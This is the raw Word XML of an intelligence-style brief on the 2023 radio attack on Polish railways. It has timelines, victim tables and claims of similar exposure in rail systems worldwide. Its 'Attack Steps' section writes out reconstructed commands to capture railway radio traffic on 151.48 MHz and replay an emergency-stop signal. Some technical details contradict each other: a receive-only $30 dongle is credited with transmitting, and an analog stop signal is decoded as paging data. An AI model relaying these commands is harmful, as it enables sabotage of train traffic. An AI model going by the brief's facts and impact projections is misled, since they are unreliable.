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f430iqwsiou" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eekxkoenz5fx" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poland Railway Radio-Frequency Attack - Weaponizing $30 SDR Against National Infrastructure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14,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te3u3hfjb4fi"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5"/>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5"/>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5"/>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5"/>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5"/>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5"/>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5"/>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5"/>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5"/>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5"/>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30jmjyxrs1fg"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In August 2023, two individuals demonstrated how $30 software-defined radios could paralyze Poland's national railway system, halting over 20 trains through simple radio frequency attacks that exploited fundamental vulnerabilities in railway radio systems used globally, including in US critical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u9yaz4h13gz8"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$30 RTL-SDR used to halt national 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Complete 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Attack replicated in 4 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Global vulnerability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US systems use identical protocols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Direct applicability to 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glv9nwvwpogp"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August 25-26,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Mariusz Czabaj &amp; Marek Jagusiak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PKP Polish State Railways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Service disruption (claimed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€2.3M immediate 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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Poland railway attack demonstrated that consumer-grade equipment can exploit design flaws in railway radio systems worldwide, with the attackers' methodology directly applicable to US Positive Train Control infrastructure using similar VHF/UHF protocols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ghb65bpdvqes"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ff0sw8jtps7w"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Poland railway RF attack blueprint threatens the foundational infrastructure that ensures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This low-cost, high-impact attack methodology can be replicated against US rail networks that transport 1.5 billion tons of freight annually, including chlorine for water treatment plants, coal for 30% of electricity generation, and 175 million tons of agricultural products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gji901608w5j"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Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: US coal trains using identical 160MHz radio systems vulnerable to disruption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Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Rail transport of treatment chemicals exposed to deliberate misrouting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Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Grain unit trains operating on attackable radio frequencies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Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Simple attacks undermining complex safety systems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jozn8jgh18jq"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x9u7c795ch2x"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Aug 20,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Frequency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PKP radio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Identified 151.48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Equipment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Aug 23,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RTL-SDR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Attack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$30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20:42:00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First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Szczecin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 trains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Main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00:32:00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Multiple broadcasts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20+ trains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Arrest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Aug 28,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Police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Perpetrators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Both detained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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95i224yu2nss" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: VHF Radio Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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Frequency Used</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 151.48 MHz (VHF)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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Analog FM, no authentication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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | RTL-SDR + laptop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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | GNU Radio, rf_replay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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Range</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 20-30 km effective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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | None at time of attack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efav3wlqchk4" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iv82duzh4n89" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis documents the immediate victims of the Poland attack and identifies global railway systems using identical vulnerable protocols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81">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hkpm2zy6g1vs" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct Victims - Poland Attack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PKP Intercity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Rail - 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20+ trains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PKP Cargo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Western Poland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7 freight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€800K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Koleje Mazowieckie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Warsaw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Commuter chaos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Koleje Wielkopolskie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Poznan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4 trains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Koleje Dolnośląskie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Lower Silesia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Service suspended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€70K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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wei4oqadzs8z" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Systems Worldwide (Identical Technology)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Country/System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Radio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Exposure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USA - Freight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AAR voice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160.215-161.610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USA - Transit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Various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150-170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Germany - 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Analog train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146-174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France - SNCF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Legacy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150-170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UK - Network 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CSR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140-170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Canada - CN/CP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Similar to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160 MHz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Australia - ARTC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Analog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160-170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India - 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Mixed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140-170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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2cv31um6lepq" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Replication Timeline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Copycat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Sep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Czech Republic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Test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Frequency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Belarus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Opposition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 trains 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Jamming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PoC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Protocol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Feb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Anonymous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Security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Disclosed privately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Encryption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Netherlands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Hacktivist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Prevented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Monitoring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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_phrnjud03qfy" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Methodology Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1x9i9ne0re60" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Poland attackers demonstrated alarming simplicity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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipment Required</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Total cost: ~$50):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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RTL-SDR dongle: $30</w:t>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Antenna: $10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laptop: Any consumer grade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software: Free open-source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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Skill Level</w:t>
      </w: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1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic radio knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YouTube tutorials sufficient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No programming required</w:t>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2-3 hours preparation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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Steps</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t xml:space="preserve"># Actual commands used (reconstructed)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t xml:space="preserve"># Step 1: Find emergency frequency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t xml:space="preserve">rtl_sdr -f 151.48M -s 2.4M capture.raw</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 Step 2: Decode radio traffic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multimon-ng -t raw -a POCSAG capture.raw</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 Step 3: Replay emergency stop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rpitx -m FM -f 151480 stop_command.wav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1n3rrbm9x8xp" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lessons from Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p4epsbvphykn" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Security Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis reveals fundamental flaws </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[47]</w:t>
        </w:r>
      </w:hyperlink>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8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Any transmitted signal accepted as legitimate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Encryption</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Commands sent in clear analog FM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Validation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Geographic or temporal verification absent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legacy Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1970s-era protocols still in use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_48g1f0viipos" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failed Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Polish railways had no effective countermeasures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No spectrum monitoring deployed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No anomaly detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No backup communication channels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual verification procedures ignored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2mv8vmr8r2g9" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zw07u67r9lf" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Poland attack methodology applied to US infrastructure would create catastrophic cascading failures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143">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_szmayvvmsdu9" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Impact (0-4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Rail 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760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167M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All freight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400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94M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30% generation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1">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[51]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Chemical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40M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Chlorine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2">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[52]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3,200 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330M impacted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Food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3">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[53]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xwf2r1635t5q" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading Failures (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Grid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Rolling blackouts as coal deliveries cease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5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
